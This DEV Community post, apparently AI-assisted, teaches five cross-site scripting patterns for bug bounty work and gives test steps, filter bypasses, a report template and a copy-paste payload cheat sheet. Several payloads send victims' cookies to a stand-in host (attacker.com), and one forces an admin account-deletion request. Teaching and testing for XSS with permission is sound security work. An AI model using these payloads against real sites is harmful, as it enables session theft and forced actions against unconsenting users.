DEV Community

Kai Learner
Kai Learner

Posted on

The XSS Patterns Hackers Use (And How to Spot Them)

XSS — Cross-Site Scripting — has been the #1 web vulnerability in bug bounty programs for years running. Not because it's exotic or clever, but because developers keep making the same five mistakes. Learn to recognize those mistakes, and you can both harden your own apps and earn real money finding them in other people's.

This article covers the five XSS patterns that actually show up in bug bounties, how to test for each one in under 30 seconds, and how to write a report that gets paid.


Why XSS Is Still Everywhere in 2026

You'd think sanitizing user input would be table stakes by now. It is — in theory. In practice:

  • Teams move fast and add new input fields without security review
  • Third-party components introduce vectors the original team didn't write
  • SPAs shifted rendering client-side, where developers think server rules still protect them
  • Developers sanitize for one context (HTML) and forget another (JavaScript, URLs, attributes)

The result: XSS findings are still being paid out weekly on every major bug bounty platform.


Pattern 1: Reflected XSS — The Simplest Attack

What's happening: User input is taken from a URL parameter or form field and written directly into the HTML response without encoding.

https://example.com/search?q=<script>alert('xss')</script>
Enter fullscreen mode Exit fullscreen mode

If the page renders "You searched for: <script>alert('xss')</script>" as raw HTML rather than escaped text, you have reflected XSS.

How to test (30 seconds)

  1. Find any input that's echoed back on the page — search bars, error messages, username displays
  2. Inject: "><svg onload="alert(1)">
  3. Check the HTML source (not the rendered page — browsers can hide it)
  4. If your tag appears unescaped, it's vulnerable

Real finding

An e-commerce site passed a category filter into a template engine without encoding:

GET /products?category="><img src=x onerror="fetch('https://attacker.com/'+document.cookie)">
Enter fullscreen mode Exit fullscreen mode

The request was logged to an admin dashboard and rendered raw. Every admin who opened the logs had their session cookie exfiltrated. $300 bounty.

Impact

Reflected XSS requires the victim to click a crafted link — usable for phishing, session hijacking, and credential theft. Lower severity than stored, but still pays.


Pattern 2: Stored XSS — Persistent and Paid Better

What's happening: User input is saved to a database and displayed to other users without sanitization.

Comment sections, user bios, product reviews, ticket subjects — anything saved and later rendered.

How to test

  1. Find a form that saves input and displays it to others
  2. Submit: <svg onload="alert(document.domain)">
  3. Load the page where the content appears
  4. If the alert fires, it's stored XSS

More complete test payload:

<img src=x onerror="new Image().src='https://attacker.com/steal?c='+document.cookie">
Enter fullscreen mode Exit fullscreen mode

Real finding

A review platform stored ratings with an unsafe template:

<p>Review: <%= user_review %></p>
Enter fullscreen mode Exit fullscreen mode

Submitting the following in the review field caused every admin who viewed it to silently fire a privileged action:

</p><script>
  fetch('/admin/delete-account?userId=' + currentUserId, {credentials: 'include'});
</script><p>
Enter fullscreen mode Exit fullscreen mode

$500 bounty. Stored XSS pays more because it affects every user who views the page — no social engineering required.


Pattern 3: DOM-Based XSS — JavaScript's Blind Spot

What's happening: Client-side JavaScript reads user-controlled input (URL fragment, query param, localStorage) and writes it to the DOM without sanitization.

// Vulnerable
const params = new URLSearchParams(window.location.search);
document.getElementById('results').innerHTML = `Results for: ${params.get('q')}`;
Enter fullscreen mode Exit fullscreen mode

Server-side WAFs and output encoding don't catch this — the server never sees the payload.

How to test

  1. Open DevTools → Sources → search for .innerHTML, .outerHTML, document.write, insertAdjacentHTML
  2. Trace where the input comes from — is any of it user-controlled?
  3. Test with: #"><img src=x onerror="alert(1)">
  4. Check if it renders

Real finding

A React app used dangerouslySetInnerHTML to render a user-supplied search highlight:

// Component rendered this:
<span dangerouslySetInnerHTML={{ __html: highlight }} />
Enter fullscreen mode Exit fullscreen mode

highlight came from a URL param. Test URL:

/search?q=test&highlight=<img src=x onerror="alert(document.cookie)">
Enter fullscreen mode Exit fullscreen mode

$400 bounty. DOM XSS is often missed because developers assume the risk is server-side.


Pattern 4: Filter Bypass — When the "Fix" Doesn't Work

What's happening: The developer added filtering, but it's incomplete. This is the pattern that separates casual testing from actual bug bounty findings.

Common broken filters and bypasses

Filter Bypass
Blocks <script> <img src=x onerror="alert(1)">
Blocks <script> (case-sensitive) <Script>alert(1)</Script>
Strips javascript: <a href="jAvAsCrIpT:alert(1)">click</a>
Strips javascript: <a href="java&#9;script:alert(1)"> (tab character)
Blocks quotes <img src=x onerror=alert(String.fromCharCode(88,83,83))>
Strips event handlers <svg><animate onbegin="alert(1)" dur="1s">
Encodes <> but not inside attributes " onmouseover="alert(1)

How to test

  1. Identify what the filter removes or encodes (test with <script>alert(1)</script> first)
  2. Try event handlers: onerror, onload, onmouseover, onfocus, onbegin
  3. Try encoding: HTML entities (&#60;), URL encoding (%3C), Unicode
  4. Try whitespace tricks: tab (&#9;), newline (&#10;) inside attributes

Real finding

A chat application stripped <script> but allowed other HTML:

<img src=x onerror="this.src='https://attacker.com/log?c='+encodeURIComponent(document.cookie)">
Enter fullscreen mode Exit fullscreen mode

Every message containing this string silently phoned home. $350 bounty.


Pattern 5: Context Confusion — Right Payload, Wrong Place

What's happening: The developer sanitizes for one context but the input ends up in another. This is why the same htmlspecialchars() call that protects HTML output doesn't protect a JavaScript string.

The four contexts and what can go wrong

HTML context — input rendered between tags:

<p>Hello, <%= username %></p>
Enter fullscreen mode Exit fullscreen mode

Fix: HTML-encode < > " ' &. Forget it and <script> executes.

Attribute context — input inside an HTML attribute:

<input value="<%= username %>">
Enter fullscreen mode Exit fullscreen mode

Fix: HTML-encode AND ensure the attribute is quoted. Without quotes, x onmouseover=alert(1) works even without <>.

JavaScript context — input embedded in a script block:

<script>var name = "<%= username %>";</script>
Enter fullscreen mode Exit fullscreen mode

Fix: JavaScript-escape (not HTML-encode). </script><script>alert(1) breaks out of the string entirely.

URL context — input used in an href or src:

<a href="<%= redirectUrl %>">Back</a>
Enter fullscreen mode Exit fullscreen mode

Fix: Validate against an allowlist. javascript:alert(1) is a valid URL that executes on click.

How to test

When you find input reflected somewhere, identify the context before choosing the payload. A payload that works in HTML context will fail in JS context, and vice versa.


How to Write a Bug Bounty Report That Gets Paid

Finding the XSS is half the work. A vague report gets triaged down or rejected.

Good structure:

**Title:** Stored XSS in user bio field allows session hijacking

**Severity:** High (CVSS 7.2)

**Steps to reproduce:**
1. Log in to the application
2. Navigate to Profile → Edit Bio
3. Enter the following in the bio field:
   <svg onload="alert(document.domain)">
4. Save the profile
5. Visit the profile page as any other user
6. The alert fires with the domain

**Impact:**
An attacker can inject arbitrary JavaScript that executes in the context of 
any user who views the profile. Practical impact: session token theft via 
document.cookie, forced actions using the victim's credentials, redirection 
to phishing pages.

**Proof of concept:** [screenshot of alert firing]

**Remediation:** HTML-encode all user-supplied content before rendering.
Apply a Content Security Policy to limit script execution.
Enter fullscreen mode Exit fullscreen mode

What makes reports get paid:

  • Exact reproduction steps that work first time
  • A screenshot or video of the exploit firing
  • Clear impact statement — what can an attacker actually do?
  • Remediation suggestion

XSS Payload Cheat Sheet

Quick reference — copy, paste, test:

# Basic probes
<script>alert(1)</script>
<svg onload="alert(1)">
"><img src=x onerror="alert(1)">
'><img src=x onerror='alert(1)'>

# Attribute escapes (no < > needed)
" onmouseover="alert(1) x="
' onfocus='alert(1)' autofocus='

# Filter bypasses
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<svg><animate onbegin="alert(1)" dur="1s">

# Without quotes
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

# Data exfil (replace attacker.com)
<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
<script>new Image().src='https://attacker.com/?c='+document.cookie</script>
Enter fullscreen mode Exit fullscreen mode

Where to Start

  1. Set up a free account on Intigriti — best European bug bounty platform
  2. Pick a target with a VDP (Vulnerability Disclosure Program) — these are legal and usually have no bounty cap
  3. Find any input field, run through the five patterns above
  4. Document everything with screenshots before reporting

First finding is the hardest. After that, the patterns repeat.


This article was written with AI assistance. All code examples represent real vulnerability patterns — test only on systems you have permission to test.


Tags: security bugbounty webdev xss cybersecurity

Top comments (0)